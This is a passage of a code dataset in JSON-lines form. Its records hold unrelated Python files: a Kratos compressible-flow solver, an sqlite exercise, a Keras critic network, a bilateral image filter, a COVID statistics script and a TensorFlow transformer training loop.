t2n[key]=tmp\n else:\n target2neighbour[key]=\"0\"\n t2n[key]=[]\n return target2neighbour, query2accession, t2n\n\nhth_anno()\n","sub_path":"ProjectOfAcrDetectorScript/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"485794839","text":"from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7\n# Importing the Kratos Library\nimport KratosMultiphysics\nimport KratosMultiphysics.FluidDynamicsApplication as KratosFluid\n\n## Import base class 
file\nfrom KratosMultiphysics.FluidDynamicsApplication.fluid_solver import FluidSolver\n\nfrom KratosMultiphysics import python_linear_solver_factory as linear_solver_factory\nfrom KratosMultiphysics.FluidDynamicsApplication import check_and_prepare_model_process_fluid\n\ndef CreateSolver(model, custom_settings):\n return NavierStokesCompressibleSolver(model, custom_settings)\n\nclass NavierStokesCompressibleSolver(FluidSolver):\n\n @classmethod\n def GetDefaultSettings(cls):\n ##settings string in json format\n default_settings = KratosMultiphysics.Parameters(\"\"\"\n {\n \"solver_type\": \"compressible_solver_from_defaults\",\n \"model_part_name\": \"\",\n \"domain_size\": -1,\n \"model_import_settings\": {\n \"input_type\": \"mdpa\",\n \"input_filename\": \"two_element_test\",\n \"reorder\": false\n },\n \"maximum_iterations\": 10,\n \"echo_level\": 1,\n \"time_order\": 2,\n \"compute_reactions\": false,\n \"reform_dofs_at_each_step\" : true,\n \"relative_tolerance\" : 1e-3,\n \"absolute_tolerance\" : 1e-5,\n \"linear_solver_settings\" : {\n \"solver_type\" : \"amgcl\",\n \"max_iteration\" : 200,\n \"tolerance\" : 1e-7,\n \"provide_coordinates\" : false,\n \"smoother_type\" : \"ilu0\",\n \"krylov_type\" : \"gmres\",\n \"coarsening_type\" : \"aggregation\",\n \"scaling\" : true,\n \"verbosity\" : 0\n },\n \"volume_model_part_name\" : \"volume_model_part\",\n \"skin_parts\": [\"\"],\n \"no_skin_parts\":[\"\"],\n \"time_stepping\" : {\n \"automatic_time_step\" : true,\n \"CFL_number\" : 1,\n \"minimum_delta_time\" : 1e-4,\n \"maximum_delta_time\" : 0.01\n },\n \"periodic\": \"periodic\",\n \"move_mesh_flag\": false\n }\"\"\")\n\n default_settings.AddMissingParameters(super(NavierStokesCompressibleSolver, cls).GetDefaultSettings())\n return default_settings\n\n def __init__(self, model, custom_settings):\n self._validate_settings_in_baseclass=True # To be removed eventually\n super(NavierStokesCompressibleSolver,self).__init__(model,custom_settings)\n\n self.element_name = \"CompressibleNavierStokes\"\n self.condition_name = \"Condition\"\n self.min_buffer_size = 3\n\n ## Construct the linear solver\n self.linear_solver = linear_solver_factory.ConstructSolver(self.settings[\"linear_solver_settings\"])\n\n ## Set the element replace settings\n #self._SetCompressibleElementReplaceSettings()\n\n print(\"Construction of NavierStokesCompressibleSolver finished.\")\n\n\n def AddVariables(self):\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.MOMENTUM)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DENSITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.TOTAL_ENERGY)\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.CONDUCTIVITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.SPECIFIC_HEAT)\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.HEAT_CAPACITY_RATIO)\n\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.BODY_FORCE)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NODAL_H) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NODAL_AREA) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION) #for momentum\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.REACTION_DENSITY) #for momentum\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.REACTION_ENERGY) #for momentum\n\n 
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.FLAG_VARIABLE) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NORMAL)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.Y_WALL) ## ?\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.EXTERNAL_PRESSURE)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.KINEMATIC_VISCOSITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DYNAMIC_VISCOSITY)\n\n # Post-process\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)\n self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.PRESSURE)\n self.main_model_part.AddNodalSolutionStepVariable(KratosFluid.MACH) #for momentum\n\n print(\"Monolithic compressible fluid solver variables added correctly\")\n\n def AddDofs(self):\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.MOMENTUM_X, KratosMultiphysics.REACTION_X, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.MOMENTUM_Y, KratosMultiphysics.REACTION_Y, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.MOMENTUM_Z, KratosMultiphysics.REACTION_Z, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DENSITY, KratosFluid.REACTION_DENSITY, self.main_model_part)\n KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.TOTAL_ENERGY, KratosFluid.REACTION_ENERGY, self.main_model_part)\n\n def Initialize(self):\n self.computing_model_part = self.GetComputingModelPart()\n\n # If needed, create the estimate time step utility\n if (self.settings[\"time_stepping\"][\"automatic_time_step\"].GetBool()):\n print(\"ERROR: _GetAutomaticTimeSteppingUtility out of date\")\n #self.EstimateDeltaTimeUtility = self._GetAutomaticTimeSteppingUtility()\n\n # Set the time discretization utility to compute the BDF coefficients\n time_order = self.settings[\"time_order\"].GetInt()\n if time_order == 2:\n self.time_discretization = KratosMultiphysics.TimeDiscretization.BDF(time_order)\n else:\n raise Exception(\"Only \\\"time_order\\\" equal to 2 is supported. 
Provided \\\"time_order\\\": \" + str(time_order))\n\n # Creating the solution strategy\n self.conv_criteria = KratosMultiphysics.ResidualCriteria(self.settings[\"relative_tolerance\"].GetDouble(),\n self.settings[\"absolute_tolerance\"].GetDouble())\n\n\n #(self.conv_criteria).SetEchoLevel(self.settings[\"echo_level\"].GetInt()\n (self.conv_criteria).SetEchoLevel(3)\n\n domain_size = self.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n rotation_utility = KratosFluid.CompressibleElementRotationUtility(domain_size,KratosMultiphysics.SLIP)\n time_scheme = KratosMultiphysics.ResidualBasedIncrementalUpdateStaticSchemeSlip(rotation_utility)\n #time_scheme = KratosMultiphysics.ResidualBasedIncrementalUpdateStaticScheme() # DOFs (4,5)\n\n\n builder_and_solver = KratosMultiphysics.ResidualBasedBlockBuilderAndSolver(self.linear_solver)\n\n\n self.solver = KratosMultiphysics.ResidualBasedNewtonRaphsonStrategy(self.computing_model_part,\n time_scheme,\n self.linear_solver,\n self.conv_criteria,\n builder_and_solver,\n self.settings[\"maximum_iterations\"].GetInt(),\n self.settings[\"compute_reactions\"].GetBool(),\n self.settings[\"reform_dofs_at_each_step\"].GetBool(),\n self.settings[\"move_mesh_flag\"].GetBool())\n\n\n (self.solver).SetEchoLevel(self.settings[\"echo_level\"].GetInt())\n #(self.solver).SetEchoLevel(1)\n\n\n (self.solver).Initialize()\n\n\n # self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.DYNAMIC_TAU, self.settings[\"dynamic_tau\"].GetDouble()) # REMEMBER TO CHECK MY STAB CONSTANTS\n\n print (\"Monolithic compressible solver initialization finished.\")\n\n\n def InitializeSolutionStep(self):\n (self.time_discretization).ComputeAndSaveBDFCoefficients(self.GetComputingModelPart().ProcessInfo)\n (self.solver).InitializeSolutionStep()\n\n\n def Solve(self):\n (self.time_discretization).ComputeAndSaveBDFCoefficients(self.GetComputingModelPart().ProcessInfo)\n (self.solver).Solve()\n\n def PrepareModelPart(self):\n super(NavierStokesCompressibleSolver,self).PrepareModelPart()\n if not self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED]:\n self._ExecuteAfterReading()\n\n def _ExecuteAfterReading(self):\n ## Replace element and conditions\n KratosMultiphysics.ReplaceElementsAndConditionsProcess(self.main_model_part, self.settings[\"element_replace_settings\"]).Execute()\n\n ## Check that the input read has the shape we like\n prepare_model_part_settings = KratosMultiphysics.Parameters(\"{}\")\n prepare_model_part_settings.AddValue(\"volume_model_part_name\",self.settings[\"volume_model_part_name\"])\n prepare_model_part_settings.AddValue(\"skin_parts\",self.settings[\"skin_parts\"])\n\n check_and_prepare_model_process_fluid.CheckAndPrepareModelProcess(self.main_model_part, prepare_model_part_settings).Execute()\n\n\n #def _SetCompressibleElementReplaceSettings(self):\n #domain_size = self.main_model_part.ProcessInfo[KratosMultiphysics.DOMAIN_SIZE]\n #self.settings.AddEmptyValue(\"element_replace_settings\")\n\n #if(domain_size == 3):\n #self.settings[\"element_replace_settings\"] = KratosMultiphysics.Parameters(\"\"\"\n #{\n #\"element_name\":\"CompressibleNavierStokes3D4N\",\n #\"condition_name\": \"Condition3D3N\"\n #}\n #\"\"\")\n #elif(domain_size == 2):\n #self.settings[\"element_replace_settings\"] = KratosMultiphysics.Parameters(\"\"\"\n #{\n #\"element_name\":\"CompressibleNavierStokes2D3N\",\n #\"condition_name\": \"Condition2D2N\"\n #}\n #\"\"\")\n #else:\n #raise Exception(\"Domain size is not 2 or 
3!!\")\n","sub_path":"applications/FluidDynamicsApplication/python_scripts/navier_stokes_compressible_solver.py","file_name":"navier_stokes_compressible_solver.py","file_ext":"py","file_size_in_byte":11146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"409324686","text":"import sqlite3\n\nwith sqlite3.connect('db/sqlite3.db') as connection:\n # create db cursorcursor()\n cursor = connection.cursor()\n\n data = (\n (\"Jean-Baptiste Zorg\", \"Human\", 122),\n (\"Korben Dallas\", \"Meat Popsicle\", 100),\n (\"Ak'not\", \"Mangalore\", -5)\n )\n\n cursor.executemany(\"INSERT INTO Roster VALUES(?, ?, ?);\", data)","sub_path":"chapters/14/exercises/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"347809169","text":"from avocado.query.translators import Translator, registry\nfrom modeltree.tree import trees\n\n\nclass AllowMissingRecord(Translator):\n \"\"\"\n HGMD is the only source of data for the variant-phenotype assocations.\n This leads to a nuance in what it means to \"not be in HGMD\". By default,\n Avocado adds a second condition to ensure the ID is also not null if the\n field itself is nullable (to exclude missing records). However because\n records _only_ exist if there is an HGMD ID, this behavior is confusing.\n\n This translator overrides this behavior and adds an OR to allow for no\n records if querying for an explicit NULL.\n \"\"\"\n def translate(self, field, roperator, rvalue, tree, **kwargs):\n output = super(AllowMissingRecord, self).translate(\n field, roperator, rvalue, tree, **kwargs)\n cleaned_data = output['cleaned_data']\n\n if (cleaned_data['operator'].lookup == 'isnull'\n and cleaned_data['value']):\n # Create a null condition for this field\n null_condition = trees[tree].query_condition(\n field.model._meta.pk, 'isnull', True)\n # Allow the null condition\n output['query_modifiers']['condition'] = null_condition\n return output\n\n\nregistry.register(AllowMissingRecord, 'Allow Missing Record')\n","sub_path":"varify/phenotypes/translators.py","file_name":"translators.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"565470253","text":"from distutils.core import setup\nimport numpy\n\ndef find_version(path):\n import re\n # path shall be a plain ascii text file.\n s = open(path, 'rt').read()\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n s, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Version not found\")\n\nsetup(\n name=\"mpi4py_test\",\n version=find_version(\"mpi4py_test/version.py\"),\n author=\"Yu Feng\",\n author_email=\"rainwoodman@gmail.com\",\n url=\"http://github.com/rainwoodman/mpi4py_test\",\n description=\"Simple testing based on numpy for applications written with mpi4py.\",\n zip_safe = False,\n package_dir = {'mpi4py_test': 'mpi4py_test'},\n install_requires=['numpy', 'mpi4py'],\n license='BSD-2-Clause',\n packages= ['mpi4py_test', 'mpi4py_test.tests'],\n requires=['numpy', 'mpi4py'],\n)\n","sub_path":"pypi_install_script/mpi4py_test-0.0.10.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"2952139","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport 
cv2\nimport math\n\ndef sliding_window(image,padded_image,window = 3):\n\ta = np.zeros(image.shape)\n\tfor x in range(image.shape[0]):\n\t\tfor y in range(image.shape[1]):\n\t\t\twin_im = padded_image[x:x+window, y:y+window]\n\t\t\t# print(image[x,y])\n\n\t\t\ta[x][y][0] = bilateral_filter(win_im[:,:,0])\n\t\t\ta[x][y][1] = bilateral_filter(win_im[:,:,1])\n\t\t\ta[x][y][2] = bilateral_filter(win_im[:,:,2])\n\treturn a\n\ndef padding(im,kernel_row=3,kernel_col=3):\n\timage_row, image_col,ch = im.shape\n\n\tpad_height = int((kernel_row - 1) / 2)\n\tpad_width = int((kernel_col - 1) / 2)\n\t \n\tpadded_image = np.zeros((image_row + (2 * pad_height), image_col + (2 * pad_width),ch))\n\tprint(padded_image.shape)\n\t \n\tpadded_image[pad_height:padded_image.shape[0] - pad_height, pad_width:padded_image.shape[1] - pad_width] = im\n\treturn padded_image\n\ndef weighting(x,sigma=1):\n\treturn math.exp(- (x ** 2) / (2 * sigma ** 2))\n\ndef bilateral_filter(win_im,sd=1,sr=1):\n\tw = 0 \n\tgk = 0\n\ti = int(win_im.shape[0]/2)\n\t# print(i)\n\tfor k in range(win_im.shape[0]):\n\t\tfor l in range(win_im.shape[1]):\n\t\t\t\n\t\t\td = weighting((i-k),sd) * weighting((i-l),sd)\n\t\t\t# print(d)\n\t\t\tv = abs(win_im[i][i] - win_im[k][l])\n\t\t\tr = weighting(v,sr)\n\t\t\tgk = gk + (win_im[k][l]*(r*d))\n\t\t\tw = w + (r*d)\n\n\treturn (gk/w)\n\nim = cv2.imread('gt_sky.png')# path needs to be channged all input images are available in the input folder\n# im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n# im = cv2.resize(im,(480,640))\npadded_image = padding(im,3,3)\noutput = sliding_window(im,padded_image,3)\ncv2.imwrite('gt _sky_ooo.jpg',output)# output images in the output folder can be used for refrence\n","sub_path":"a2_2019702002/src/q6/bilateral.py","file_name":"bilateral.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"643895959","text":"from keras import layers, models, optimizers\nfrom keras import backend as K\nimport tensorflow as tf\nfrom numpy.random import seed\nfrom tensorflow import set_random_seed\nseed(14)\nset_random_seed(14)\n\nclass Critic:\n \"\"\"Critic (Value) Model.\"\"\"\n\n def __init__(self, state_size, action_size, lr):\n \"\"\"Initialize parameters and build model.\n\n Params\n ======\n state_size (int): Dimension of each state\n action_size (int): Dimension of each action\n lr (float): Adam optimizer learning rate\n \"\"\"\n self.state_size = state_size\n self.action_size = action_size \n self.lr = lr\n\n self.build_model()\n\n def build_model(self):\n \"\"\"Build a critic (value) network that maps (state, action) pairs -> Q-values.\"\"\"\n states = layers.Input(shape=(self.state_size,))\n actions = layers.Input(shape=(self.action_size,))\n stat_act = layers.Concatenate()([states, actions])\n\n net = layers.Dense(units=400)(stat_act)\n net = layers.Activation('relu')(net)\n net = layers.Dense(units=300)(net)\n net = layers.Activation('relu')(net)\n \n Q_values = layers.Dense(1)(net)\n \n self.model = models.Model(inputs=[states, actions], outputs=Q_values) \n\n # Define optimizer and compile model for training with built-in loss function\n optimizer = optimizers.Adam(lr=self.lr)\n self.model.compile(optimizer=optimizer, loss='mse')\n\n # Compute action gradients (derivative of Q values w.r.t. 
to actions)\n gradients = K.gradients(Q_values, actions)\n self.get_gradients = K.function(\n inputs=[*self.model.input, K.learning_phase()], \n outputs=gradients) \n","sub_path":"agents/critic.py","file_name":"critic.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"67841192","text":"import random\ndef get_rand_list(x, y, n):\n k = random.sample(range(x,y), n)\n return k\ndef get_overlap(first, second):\n list = []\n for i in first:\n for k in second:\n if i == k:\n list.append(i)\n return list\ndef main():\n x = int(input(\"begin:\"))\n y = int(input(\"end:\"))\n n = int(input(\"N:\"))\n first = get_rand_list(x, y, n)\n second = get_rand_list(x, y, n)\n list = get_overlap(first, second)\n print(first)\n print(second)\n print(list)\n\nmain()","sub_path":"lab8/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"594492041","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport statistics\nimport collections\nfrom sklearn.linear_model import LinearRegression\n\n# Import and Clean Time Series\ndataset = pd.read_csv(\"CumulativeCases.csv\")\n\ndates = dataset['Date']\ncolombia_dataset = dataset['Colombia']\nbelgium_dataset = dataset['Belgium']\n\n# Create lists from the datasets.\nlist_colombia = list(colombia_dataset)\nlist_belgium = list(belgium_dataset)\n\n\n#### Measures of Central Tendency\n\ndef central_tendency_spread():\n #### MEAN ###\n mean_colombia = colombia_dataset.mean()\n mean_belgium = belgium_dataset.mean()\n\n print(\"Measures of Central Tendency\", end=\"\\n\\n\")\n print(\"Colombia Mean: \", mean_colombia)\n print('Belgium Mean: ', mean_belgium)\n\n #### MEDIAN\n median_colombia = colombia_dataset.median()\n median_belgium = belgium_dataset.median()\n\n print(\"Colombia Median: \", median_colombia)\n print('Belgium Median: ', median_belgium)\n\n #### MODE\n mode_colombia = colombia_dataset.mode()\n mode_belgium = belgium_dataset.mode()\n\n print(\"Colombia Mode: \", int(mode_colombia))\n print('Belgium Mode: ', int(mode_belgium), end=\"\\n\\n\\n\")\n\n variance_colombia = statistics.variance(list(colombia_dataset))\n variance_belgium = statistics.variance(list(belgium_dataset))\n \n print(\"Measures of Spread\", end=\"\\n\\n\")\n\n print(\"Colombia Variance: \", variance_colombia)\n print(\"Belgium Variance: \", variance_belgium)\n\n pvariance_colombia = statistics.pvariance(list(colombia_dataset))\n pvariance_belgium = statistics.pvariance(list(belgium_dataset))\n\n print(\"Colombia Population Variance: \", pvariance_colombia)\n print(\"Belgium Population Variance: \", pvariance_belgium)\n\n stdev_colombia = statistics.stdev(list(colombia_dataset))\n stdev_belgium = statistics.stdev(list(belgium_dataset))\n\n print(\"Colombia Standard Deviation: \", stdev_colombia)\n print(\"Belgium Standard Deviation: \", stdev_belgium)\n\n pstdev_colombia = statistics.pstdev(list(colombia_dataset))\n pstdev_belgium = statistics.pstdev(list(belgium_dataset))\n\n print(\"Colombia Population Standard Deviation: \", pstdev_colombia)\n print(\"Belgium Population Standard Deviation: \", pstdev_belgium)\n # Write Results into XSLX File\n\n data1 = {\n 'Measures of Central Tendency' : ['Mean', 'Median', 'Mode'],\n 'Belgium': [int(mean_belgium), int(median_belgium), int(mode_belgium)],\n 'Colombia' : [int(mean_colombia), 
int(median_colombia), int(mode_colombia)],\n }\n\n data2 = {\n 'Measures of Spread' : ['Variance', 'Population Variance', 'Standard Deviation', 'Population Standard Deviation'],\n 'Belgium' : [int(variance_belgium), int(pvariance_belgium), int(stdev_belgium), int(pstdev_belgium)],\n 'Colombia' : [int(variance_colombia), int(pvariance_colombia), int(stdev_colombia), int(pstdev_colombia)]\n }\n\n df1 = pd.DataFrame(data1, columns = ['Measures of Central Tendency', 'Belgium', 'Colombia'])\n df2 = pd.DataFrame(data2, columns = ['Measures of Spread', 'Belgium', 'Colombia'])\n\n # Save Results to Excel Files\n df1.to_excel('cent_tend.xlsx', index=False, header=True)\n df2.to_excel('spread.xlsx', index=False, header=True)\n\n\n### FREQUENCIES\ndef frequencies():\n freq_colombia = collections.Counter(list_colombia)\n freq_belgium = collections.Counter(list_belgium)\n\n print(\"Colombia Frequencies: \", freq_colombia, end=\"\\n\\n\")\n print(\"Belgium Frequencies: \", freq_belgium)\n\n # PLOT HISTOGRAM\n plt.style.use('ggplot')\n # Belgium\n plt.hist(list_belgium, bins=10, label=\"Belgium\")\n\n # Colombia\n plt.hist(list_colombia, bins=10, label=\"Colombia\")\n\n # Plot\n plt.legend()\n plt.show()\n\n\n# MOVING AVERAGES & VOLATILITY\nwindow_size = 10\n# convert list to series\nbelgium_series = pd.Series(list_belgium)\nbelgium_windows = belgium_series.rolling(window_size)\n\ncolombia_series = pd.Series(list_colombia)\ncolombia_windows = colombia_series.rolling(window_size)\n\n# remove NaN\nbelgium_moving_averages = belgium_windows.mean().tolist()[window_size - 1:]\ncolombia_moving_averages = colombia_windows.mean().tolist()[window_size - 1:]\n\ndef moving_averages():\n print(belgium_moving_averages)\n print(colombia_moving_averages)\n # Plot Moving Averages\n plt.plot(belgium_moving_averages, label=\"Belgium\")\n plt.plot(colombia_moving_averages, label=\"Colombia\")\n plt.legend()\n plt.show()\n\n# Volatility\nbelgium_volatility = belgium_windows.std(ddof=0).tolist()[window_size - 1:]\ncolombia_volatility = colombia_windows.std(ddof=0).tolist()[window_size - 1:]\n\ndef volatility():\n print(belgium_volatility)\n print(colombia_volatility)\n # Plot Volatility\n plt.plot(belgium_volatility, label=\"Belgium\")\n plt.plot(colombia_volatility, label=\"Colombia\")\n plt.legend()\n plt.show()\n\n\ndef write_avg_vol_to_csv():\n # Write Measures of Volatility and Average to .csv file\n data = {\n 'Belgium Volatility': belgium_volatility,\n 'Belgium Average' : belgium_moving_averages,\n 'Colombia Volatility' : colombia_volatility,\n 'Colombia Average' : colombia_moving_averages\n }\n\n df = pd.DataFrame(data, columns = ['Belgium Volatility', 'Belgium Average', 'Colombia Volatility', 'Colombia Average'])\n\n # Save Results to Excel Files\n df.to_csv('vol_avg.csv', index=False, header=True)\n\n# Linear Regression\ndef linear_regression():\n x = np.array(list_belgium).reshape(-1, 1)\n y = np.array(list_colombia)\n\n model = LinearRegression()\n model.fit(x, y)\n\n result = model.score(x, y)\n print(result)\n\n # Plot scatter plot to determine linear correlation\n x2 = np.array(list_belgium) # create 1D array for plot\n\n plt.plot(x2, y, 'o')\n m, b = np.polyfit(x2, y, 1)\n plt.plot(x2, m*x2, + b)\n plt.show()","sub_path":"Statistics-Assignment-master/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"373483559","text":"def pal(x):\n\tres=0\n\twhile 
x:\n\t\tres=res*10+x%10\n\t\tx//=10\n\treturn res\n\ndef ispal(x):\n\ts=str(x)\n\tlength=len(s)\n\tfor i in range(length//2):\n\t\tif(s[i]!=s[length-i-1]):\n\t\t\treturn False\n\treturn True\n\nn,k=map(int,input().split())\n\nstep=0\nif(ispal(n)):\n\tprint(n)\n\tprint(0)\n\texit()\nwhile(1):\n\tn+=pal(n)\n\tstep+=1\n\tif(ispal(n)):\n\t\tbreak\n\telif step==k:\n\t\tbreak\nprint(n)\nprint(step)","sub_path":"PAT/1024.py","file_name":"1024.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"136672768","text":"from urllib.parse import urlparse\nwith open('orgginal.txt') as f,open('out.txt', 'w') as f_out:\n for line in f:\n line = line.strip()\n parsed = urlparse(line)\n #print(line)\n newline=parsed._replace(query='').geturl()\n print(newline)\n #f_out.write('{}\\n'.format(line))\n\t","sub_path":"Python/tmp/url_pars/url_remove_string2.py","file_name":"url_remove_string2.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158094738","text":"import tensorflow as tf\nimport numpy as np\nimport os, time, math, json, joblib, random, argparse\n\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import accuracy_score\n\nfrom util.opt import adam\nfrom util.utils import iter_data, find_trainable_variables, ResultLogger, assign_to_gpu, average_grads, make_path\nfrom data.data import gen_squad_data\nfrom metrics.metrics import target_based_np_rouge\n\nfrom models.transformer_lm import language_model as model\n\n# modified from https://github.com/openai/finetune-transformer-lm/blob/master/train.py\n\ndef mgpu_train(*xs):\n gpu_ops = []\n gpu_grads = []\n xs = (tf.split(x, n_gpu, 0) for x in xs)\n for i, xs in enumerate(zip(*xs)):\n do_reuse = True if i > 0 else None\n with tf.device(assign_to_gpu(i, \"/gpu:0\")), tf.variable_scope(tf.get_variable_scope(), reuse=do_reuse):\n lm_logits, lm_losses = model(*xs, \n n_vocab=n_vocab, n_special=n_special, n_ctx=n_ctx, n_embd=n_embd, \n embd_pdrop=embd_pdrop, n_layer=n_layer, n_head=n_head, attn_pdrop=attn_pdrop, \n resid_pdrop=resid_pdrop, train=True, reuse=do_reuse)\n train_loss = tf.reduce_mean(lm_losses)\n params = find_trainable_variables(\"model\")\n grads = tf.gradients(train_loss, params)\n grads = list(zip(grads, params))\n gpu_grads.append(grads)\n gpu_ops.append([lm_logits, lm_losses])\n ops = [tf.concat(op, 0) for op in zip(*gpu_ops)]\n grads = average_grads(gpu_grads)\n grads = [g for g, p in grads]\n train = adam(params, grads, lr, lr_schedule, n_updates_total, warmup=lr_warmup, l2=l2, max_grad_norm=max_grad_norm, vector_l2=vector_l2, b1=b1, b2=b2, e=e)\n return [train]+ops\n\ndef mgpu_predict(*xs):\n gpu_ops = []\n xs = (tf.split(x, n_gpu, 0) for x in xs)\n for i, xs in enumerate(zip(*xs)):\n with tf.device(assign_to_gpu(i, \"/gpu:0\")), tf.variable_scope(tf.get_variable_scope(), reuse=True):\n lm_logits, lm_losses = model(*xs, \n n_vocab=n_vocab, n_special=n_special, n_ctx=n_ctx, n_embd=n_embd, \n embd_pdrop=embd_pdrop, n_layer=n_layer, n_head=n_head, attn_pdrop=attn_pdrop, \n resid_pdrop=resid_pdrop, train=False, reuse=True)\n gpu_ops.append([lm_logits, lm_losses])\n ops = [tf.concat(op, 0) for op in zip(*gpu_ops)]\n return ops\n\ndef iter_apply(Xs, Ms):\n fns = [lambda x:np.concatenate(x, 0), lambda x:float(np.sum(x))]\n results = []\n for xmb, mmb in iter_data(Xs, Ms, n_batch=n_batch_train, truncate=False, verbose=True):\n n = len(xmb)\n idx_mask = 
np.equal(xmb[:,:,0], delimiter).astype(int)\n end_idxs = np.argmax(np.equal(xmb[:,:,0], end).astype(int), 1)\n delim_idxs = np.argmax(idx_mask,1)\n if n == n_batch_train:\n for i in range(np.max(end_idxs - delim_idxs)):\n ev_logits, ev_lm_loss = sess.run([eval_mgpu_logits, eval_mgpu_lm_loss], {X_train:xmb, M_train:mmb})\n pred = np.argmax(ev_logits, 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n else:\n for i in range(np.max(end_idxs - delim_idxs)):\n ev_logits, ev_lm_losses = sess.run([eval_logits, eval_lm_loss], {X:xmb, M:mmb})\n pred = np.argmax(ev_logits, 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n res = [pred * n, ev_lm_loss * n]\n results.append(res)\n results = zip(*results)\n return [fn(res) for res, fn in zip(results, fns)]\n\ndef iter_predict(Xs, Ms):\n preds = []\n for xmb, mmb in iter_data(Xs, Ms, n_batch=n_batch_train, truncate=False, verbose=True):\n n = len(xmb)\n idx_mask = np.equal(xmb[:,:,0], delimiter).astype(int)\n end_idxs = np.argmax(np.equal(xmb[:,:,0], end).astype(int), 1)\n delim_idxs = np.argmax(idx_mask,1)\n if n == n_batch_train:\n for i in range(np.max(end_idxs - delim_idxs)):\n pred = np.argmax(sess.run(eval_mgpu_logits, {X_train:xmb, M_train:mmb}), 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n else:\n for i in range(np.max(end_idxs - delim_idxs)):\n pred = np.argmax(sess.run(eval_logits, {X:xmb, M:mmb}), 1)\n idx_mask = roll_mask(idx_mask)\n xmb = next_xmb(xmb, pred, idx_mask)\n if all_finished(np.reshape(pred,xmb[:,1:,0].shape), end):\n break\n preds.append(pred)\n preds = np.concatenate(preds, 0)\n return preds\n\ndef next_xmb(xmb, pred, idx_mask):\n reshaped_pred = np.reshape(pred,xmb[:,1:,0].shape)\n pad = np.zeros_like(xmb[:,:1,0])\n m_xmb = xmb*np.expand_dims(1-idx_mask,2)\n m_pred = np.expand_dims(np.concatenate([reshaped_pred,pad],1)*idx_mask,2)\n return m_xmb + m_pred\n\ndef all_finished(t, end):\n return np.sum(np.any(np.equal(t, end),1)) == len(t)\n\ndef roll_mask(m):\n e_slice = np.zeros_like(m[:,:1])\n r_slice = np.roll(m,1)[:,1:]\n rm = np.concatenate([e_slice,r_slice],1)\n return rm\n\ndef save(path):\n ps = sess.run(params)\n joblib.dump(ps, 